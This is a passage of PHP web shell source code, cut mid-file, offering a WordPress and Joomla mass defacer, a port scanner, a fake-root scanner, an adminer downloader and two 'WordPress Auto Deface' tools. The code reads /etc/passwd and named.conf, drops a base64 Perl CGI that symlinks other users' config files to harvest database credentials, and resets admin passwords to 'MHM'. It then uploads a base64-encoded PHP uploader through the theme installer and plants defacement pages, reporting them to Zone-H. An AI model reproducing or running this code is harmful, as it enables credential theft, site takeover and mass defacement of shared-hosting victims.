2415.   kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
2416.   B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr  = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def);  $output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
2417.   kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
2418.   VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
2419.   3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
2420.   cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
2421.   MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
2422.   R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt', $_POST['man_data']);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr  = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}echo '<!DOCTYPE html><html><head><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}input[type="radio"]{margin-top: 0;}.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {background-color: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6); color: white;}.green {color:#00FF00;font-weight:bold;}.red {color:#FF0000;font-weight:bold;}</style><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';}}function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><h2 style="font-size:25px;color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '<form action="" method="post"><table align=center><tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr><tr id="tra" style="display: none;"><td></td><td><textarea cols="60" rows="10" name="man_data"></textarea></td></tr></table><br><input type="hidden" name="form_action" value="1"><table align=center><tr><td><b>index url: </b><input class="inputz" size="45" type="text" name="defpage" value=""></tr></td></table><center><input class="inputzbut" type="submit" value="Attack !" name="Submit"></center></form>';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '</body></html>';
2423.    }
2424. }  elseif($_GET['do'] == 'ports') {
2425.     echo '<table><tr><th><center><u>Port Scanner</u></tr></th></center><td>';
2426.     echo '<div class="content">';
2427.     echo '<form action="" method="post">';
2428.    
2429.     if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
2430.         $start = strip_tags($_POST['start']);
2431.         $end = strip_tags($_POST['end']);
2432.         $host = strip_tags($_POST['host']);
2433.         for($i = $start; $i<=$end; $i++){
2434.             $fp = @fsockopen($host, $i, $errno, $errstr, 3);
2435.             if($fp){
2436.                 echo 'Port '.$i.' is <font color=green>open</font><br>';
2437.             }
2438.             flush();
2439.         }
2440.     } else {
2441.         echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
2442.              <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
2443.              <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
2444.              Host: <input type="text" name="host" value="localhost"/><br /><br />
2445.              Port start: <input type="text" name="start" value="0"/><br /><br />
2446.              Port end:<input type="text" name="end" value="5000"/><br /><br />
2447.              <input type="submit" value="Scan Ports" />
2448.              </form></center><br /><br />';
2449.     echo '</div></table></td>';
2450.  
2451. }
2452. }elseif($_GET['do'] == 'fake_root') {
2453.     ob_start();
2454.     $cwd = getcwd();
2455.     $ambil_user = explode("/", $cwd);
2456.     $user = $ambil_user[2];
2457.     if($_POST['reverse']) {
2458.         $site = explode("\r\n", $_POST['url']);
2459.         $file = $_POST['file'];
2460.         foreach($site as $url) {
2461.             $cek = getsource("$url/~$user/$file");
2462.             if(preg_match("/hacked/i", $cek)) {
2463.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=white>Fake Root!</font><br>";
2464.             }
2465.         }
2466.     } else {
2467.         echo "<center><form method='post'>
2468.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
2469.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
2470.         Domain: <br>
2471.         <textarea style='width: 450px; height: 250px;' name='url'>";
2472.         reverse($_SERVER['HTTP_HOST']);
2473.         echo "</textarea><br>
2474.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
2475.         </form><br>
2476.         Note: Before using this tool , first upload your deface file on dir /home/user/ dan /home/user/public_html.</center>";
2477.     }
2478. } elseif($_GET['do'] == 'adminer') {
2479.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2480.     function adminer($url, $isi) {
2481.         $fp = fopen($isi, "w");
2482.         $ch = curl_init();
2483.               curl_setopt($ch, CURLOPT_URL, $url);
2484.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
2485.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2486.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
2487.               curl_setopt($ch, CURLOPT_FILE, $fp);
2488.         return curl_exec($ch);
2489.               curl_close($ch);
2490.         fclose($fp);
2491.         ob_flush();
2492.         flush();
2493.     }
2494.     if(file_exists('adminer.php')) {
2495.         echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
2496.     } else {
2497.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
2498.             echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
2499.         } else {
2500.             echo "<center><font color=red>Failed buat file adminer</font></center>";
2501.         }
2502.     }
2503. } elseif($_GET['do'] == 'auto_dwp') {
2504.     if($_POST['auto_deface_wp']) {
2505.         function anucurl($sites) {
2506.             $ch = curl_init($sites);
2507.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2508.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2509.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2510.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2511.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2512.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2513.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2514.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2515.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2516.             $data = curl_exec($ch);
2517.                   curl_close($ch);
2518.             return $data;
2519.         }
2520.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2521.             $post = array(
2522.                    "log" => "$userr",
2523.                    "pwd" => "$pass",
2524.                    "rememberme" => "forever",
2525.                    "wp-submit" => "$wp_submit",
2526.                    "redirect_to" => "$web",
2527.                    "testcookie" => "1",
2528.                    );
2529.             $ch = curl_init($cek);
2530.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2531.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2532.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2533.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2534.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2535.                   curl_setopt($ch, CURLOPT_POST, 1);
2536.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2537.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2538.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2539.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2540.             $data = curl_exec($ch);
2541.                   curl_close($ch);
2542.             return $data;
2543.         }
2544.         $scan = $_POST['link_config'];
2545.         $link_config = scandir($scan);
2546.         $script = htmlspecialchars($_POST['script']);
2547.         $user = "MHM";
2548.         $pass = "MHM";
2549.         $passx = md5($pass);
2550.         foreach($link_config as $dir_config) {
2551.             if(!is_file("$scan/$dir_config")) continue;
2552.             $config = file_get_contents("$scan/$dir_config");
2553.             if(preg_match("/WordPress/", $config)) {
2554.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
2555.                 $dbuser = ambilkata($config,"DB_USER', '","'");
2556.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2557.                 $dbname = ambilkata($config,"DB_NAME', '","'");
2558.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
2559.                 $prefix = $dbprefix."users";
2560.                 $option = $dbprefix."options";
2561.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2562.                 $db = mysql_select_db($dbname);
2563.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2564.                 $result = mysql_fetch_array($q);
2565.                 $id = $result[ID];
2566.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2567.                 $result2 = mysql_fetch_array($q2);
2568.                 $target = $result2[option_value];
2569.                 if($target == '') {                
2570.                     echo "[-] <font color=red>error, cant take the domain name</font><br>";
2571.                 } else {
2572.                     echo "[+] $target <br>";
2573.                 }
2574.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2575.                 if(!$conn OR !$db OR !$update) {
2576.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2577.                     mysql_close($conn);
2578.                 } else {
2579.                     $site = "$target/wp-login.php";
2580.                     $site2 = "$target/wp-admin/theme-install.php?upload";
2581.                     $b1 = anucurl($site2);
2582.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2583.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2584.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2585.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2586.                     $www = "m.php";
2587.                     $fp5 = fopen($www,"w");
2588.                     fputs($fp5,$upload3);
2589.                     $post2 = array(
2590.                             "_wpnonce" => "$anu2",
2591.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2592.                             "themezip" => "@$www",
2593.                             "install-theme-submit" => "Install Now",
2594.                             );
2595.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2596.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2597.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2598.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2599.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2600.                           curl_setopt($ch, CURLOPT_POST, 1);
2601.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2602.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2603.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2604.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2605.                     $data3 = curl_exec($ch);
2606.                           curl_close($ch);
2607.                     $y = date("Y");
2608.                     $m = date("m");
2609.                     $namafile = "id.php";
2610.                     $fpi = fopen($namafile,"w");
2611.                     fputs($fpi,$script);
2612.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2613.                            curl_setopt($ch6, CURLOPT_POST, true);
2614.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2615.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2616.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2617.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2618.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
2619.                     $postResult = curl_exec($ch6);
2620.                            curl_close($ch6);
2621.                     $as = "$target/k.php";
2622.                     $bs = anucurl($as);
2623.                     if(preg_match("#$script#is", $bs)) {
2624.                         echo "[+] <font color='white'>managed tepes...</font><br>";
2625.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2626.                         } else {
2627.                         echo "[-] <font color='red'>Failed tepes...</font><br>";
2628.                         echo "[!!] coba aja manual: <br>";
2629.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2630.                         echo "[+] username: <font color=white>$user</font><br>";
2631.                         echo "[+] password: <font color=white>$pass</font><br><br>";    
2632.                         }
2633.                     mysql_close($conn);
2634.                 }
2635.             }
2636.         }
2637.     } else {
2638.         echo "<center><h1>WordPress Auto Deface</h1>
2639.         <form method='post'>
2640.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
2641.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by Ameer_Awwad & MHM' required><br>
2642.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2643.         </form>
2644.         <br><span>Note: Tools will workif you run it in folder of <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
2645.         </center>";
2646.     }
2647. } elseif($_GET['do'] == 'auto_dwp2') {
2648.     if($_POST['auto_deface_wp']) {
2649.         function anucurl($sites) {
2650.             $ch = curl_init($sites);
2651.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2652.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2653.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2654.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2655.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2656.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2657.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2658.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2659.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
2660.             $data = curl_exec($ch);
2661.                   curl_close($ch);
2662.             return $data;
2663.         }
2664.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2665.             $post = array(
2666.                    "log" => "$userr",
2667.                    "pwd" => "$pass",
2668.                    "rememberme" => "forever",
2669.                    "wp-submit" => "$wp_submit",
2670.                    "redirect_to" => "$web",
2671.                    "testcookie" => "1",
2672.                    );
2673.             $ch = curl_init($cek);
2674.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2675.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2676.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2677.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2678.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2679.                   curl_setopt($ch, CURLOPT_POST, 1);
2680.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2681.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2682.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2683.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2684.             $data = curl_exec($ch);
2685.                   curl_close($ch);
2686.             return $data;
2687.         }
2688.         $link = explode("\r\n", $_POST['link']);
2689.         $script = htmlspecialchars($_POST['script']);
2690.         $user = "MHM";
2691.         $pass = "MHM";
2692.         $passx = md5($pass);
2693.         foreach($link as $dir_config) {
2694.             $config = anucurl($dir_config);
2695.             $dbhost = ambilkata($config,"DB_HOST', '","'");
2696.             $dbuser = ambilkata($config,"DB_USER', '","'");
2697.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2698.             $dbname = ambilkata($config,"DB_NAME', '","'");
2699.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
2700.             $prefix = $dbprefix."users";
2701.             $option = $dbprefix."options";
2702.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2703.             $db = mysql_select_db($dbname);
2704.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2705.             $result = mysql_fetch_array($q);
2706.             $id = $result[ID];
2707.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2708.             $result2 = mysql_fetch_array($q2);
2709.             $target = $result2[option_value];
2710.             if($target == '') {                
2711.                 echo "[-] <font color=red>error, cant take the domain name</font><br>";
2712.             } else {
2713.                 echo "[+] $target <br>";
2714.             }
2715.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2716.             if(!$conn OR !$db OR !$update) {
2717.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2718.                 mysql_close($conn);
2719.             } else {
2720.                 $site = "$target/wp-login.php";
2721.                 $site2 = "$target/wp-admin/theme-install.php?upload";
2722.                 $b1 = anucurl($site2);
2723.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2724.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2725.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2726.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2727.                 $www = "m.php";
2728.                 $fp5 = fopen($www,"w");
2729.                 fputs($fp5,$upload3);
2730.                 $post2 = array(
2731.                         "_wpnonce" => "$anu2",
2732.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2733.                         "themezip" => "@$www",
2734.                         "install-theme-submit" => "Install Now",
2735.                         );
2736.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2737.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2738.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2739.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2740.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2741.                       curl_setopt($ch, CURLOPT_POST, 1);
2742.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2743.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2744.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2745.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2746.                 $data3 = curl_exec($ch);
2747.                       curl_close($ch);
2748.                 $y = date("Y");
2749.                 $m = date("m");
2750.                 $namafile = "id.php";
2751.                 $fpi = fopen($namafile,"w");
2752.                 fputs($fpi,$script);
2753.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2754.                        curl_setopt($ch6, CURLOPT_POST, true);
2755.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2756.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2757.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2758.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2759.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
2760.                 $postResult = curl_exec($ch6);
2761.                        curl_close($ch6);
2762.                 $as = "$target/k.php";
2763.                 $bs = anucurl($as);
2764.                 if(preg_match("#$script#is", $bs)) {
2765.                     echo "[+] <font color='white'>managed tepes...</font><br>";
2766.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2767.                     } else {
2768.                     echo "[-] <font color='red'>Failed tepes...</font><br>";
2769.                     echo "[!!] coba aja manual: <br>";
2770.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2771.                     echo "[+] username: <font color=white>$user</font><br>";
2772.                     echo "[+] password: <font color=white>$pass</font><br><br>";    
2773.                     }
2774.                 mysql_close($conn);
2775.             }
2776.         }
2777.     } else {
2778.         echo "<center><h1>WordPress Auto Deface V.2</h1>
2779.         <form method='post'>
2780.         Link Config: <br>
2781.         <textarea name='link' placeholder='http://target.com/MYS_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
2782.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by Ameer_Awwad & MHM ' required><br>
2783.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2784.         </form></center>";
2785.     }
2786. } elseif(isset($_GET['do']) && ($_GET['do'] == 'reverse')){
2787. ?>
2788. <br>
2789. <center><div id="sitelist"><a onClick="window.open('http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>"><div id='menu'>[ Reverse IP Lookup ] </a></center>
2790. <br>
2791. <?php
2792. } elseif($_GET['do'] == 'network') {
2793.     echo "<form method='post'>
2794.     <u>Bind Port:</u> <br>
